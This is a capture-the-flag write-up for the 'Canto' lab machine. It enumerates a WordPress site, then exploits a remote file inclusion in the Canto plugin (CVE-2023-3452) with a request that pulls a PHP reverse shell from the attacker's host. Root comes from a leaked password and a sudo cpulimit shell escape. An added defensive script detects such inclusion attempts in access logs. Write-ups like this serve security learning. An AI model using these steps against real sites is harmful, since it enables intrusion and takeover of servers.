HMV Canto
Todd

Information Gathering

IP=192.168.0.194
nmap $IP

22/tcp open ssh
80/tcp open http

Visiting it shows a simple page with nothing on it. Run a directory scan.

gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,bk,bak,zip,tar,gz,7z -t 50

/wp-content (Status: 301) [Size: 319] [--> http://192.168.0.194/wp-content/]
/wp-admin (Status: 301) [Size: 317] [--> http://192.168.0.194/wp-admin/]
/wp-includes (Status: 301) [Size: 320] [--> http://192.168.0.194/wp-includes/]
/xmlrpc.php (Status: 405) [Size: 42]
/index.php (Status: 301) [Size: 0] [--> http://192.168.0.194/]
/wp-trackback.php (Status: 200) [Size: 135]
/readme.html (Status: 200) [Size: 7401]
/license.txt (Status: 200) [Size: 19915]
/wp-login.php (Status: 200) [Size: 5147]
/server-status (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]

So it is a WordPress site. Scan it right away.

wpscan -e u,ap --url $IP

[+] Headers
| Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.194/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.194/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.194/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.194/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.3 identified (Latest, released on 2024-05-07).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.0.194/index.php/feed/, <generator>https://wordpress.org/?v=6.5.3</generator>
| - http://192.168.0.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.5.3</generator>

[+] WordPress theme in use: twentytwentyfour
| Location: http://192.168.0.194/wp-content/themes/twentytwentyfour/
| Latest Version: 1.1 (up to date)
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://192.168.0.194/wp-content/themes/twentytwentyfour/readme.txt
| [!] Directory listing is enabled
| Style URL: http://192.168.0.194/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.0.194/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] erik
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.0.194/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jun 5 15:26:58 2024
[+] Requests Done: 23
[+] Cached Requests: 36
[+] Data Sent: 6.22 KB
[+] Data Received: 70.141 KB
[+] Memory used: 263.816 MB
[+] Elapsed time: 00:00:02

Found a user, erik. Check whether he has a weak password.

wpscan -U erik -P /usr/share/wordlists/seclists/Passwords/2023-200_most_used_passwords.txt --url $IP

Ran a few small wordlists, nothing. Ran rockyou for a while, still nothing.

After a hint from ta0 that there is a CVE, I searched around and found https://github.com/leoanggal1/CVE-2023-3452-PoC?tab=readme-ov-file. The principle is really simple.
There is an automated script, but I wanted to try it by hand.

  1. Download a PHP reverse shell file, put it under a wp-admin subdirectory of some directory, and rename it admin.php. Remember to change the reverse shell's IP and port to your own.
  2. Start pwncat: pwncat-cs -lp 1234
  3. Visit http://$IP/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.0.30:8888
  4. That's it. The shell came back.
(remote) www-data@canto:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
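An added example from the defender's side, not part of the original post: the request in step 3 is a remote-file-inclusion pattern, so a log monitor can flag hits on the Canto plugin's download.php whose wp_abspath parameter carries a URL scheme instead of a local path. The access-log lines below are constructed; the endpoint path and parameter name are the ones from the request above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample Apache access-log lines (not captured from the box).
SAMPLE_LOG = """\
192.168.0.30 - - [05/Jun/2024:15:40:01 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.0.30:8888 HTTP/1.1" 200 512 "-" "curl/8.5.0"
192.168.0.55 - - [05/Jun/2024:15:41:10 +0000] "GET /index.php/feed/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.0.30 - - [05/Jun/2024:15:42:33 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=/var/www/html HTTP/1.1" 200 300 "-" "curl/8.5.0"
10.0.0.7 - - [05/Jun/2024:15:43:00 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=HtTp://evil.example:80/x HTTP/1.1" 200 512 "-" "python-requests/2.31"
172.16.5.4 - - [05/Jun/2024:15:44:12 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http%3A%2F%2F172.16.5.4%3A8000 HTTP/1.1" 200 512 "-" "curl/8.5.0"
"""

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/wp-content/plugins/canto/includes/lib/download.php"
# Any of these schemes in wp_abspath means the include target is not a local directory.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data"}


def classify(target):
    """'remote' if wp_abspath carries a URL scheme, 'local' if it is a plain path,
    None if the request is not for the vulnerable endpoint at all."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    values = parse_qs(parts.query).get("wp_abspath")
    if not values:
        return None
    # parse_qs already percent-decodes, so http%3A%2F%2F... is caught as well.
    scheme = urlsplit(values[0]).scheme.lower()
    return "remote" if scheme in REMOTE_SCHEMES else "local"


def find_rfi_attempts(log_text):
    """Return (ip, timestamp, target) for each request that tries to make
    download.php include a remote location."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and classify(m.group("target")) == "remote":
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, ts, target in find_rfi_attempts(SAMPLE_LOG):
        print(f"[RFI attempt] {ts} {ip} {target}")
```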

Privilege Escalation

In user erik's home directory there is a Note directory containing a diary. The Day 2 entry says he has a backup directory; it is at /var/wordpress/backups, and the txt file inside is erik's password.

ssh erik@$IP
sudo -l
Matching Defaults entries for erik on canto:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimit

Looked it up at https://gtfobins.github.io/gtfobins/cpulimit/#shell

sudo cpulimit -l 100 -f /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

All done. 🎉

Follow-up

After a tip from a more experienced player: if the scan had used
wpscan --url http://192.168.3.155/ --plugins-detection aggressive -e u,ap
the plugin would have been detected, and from there the vulnerability could have been found.
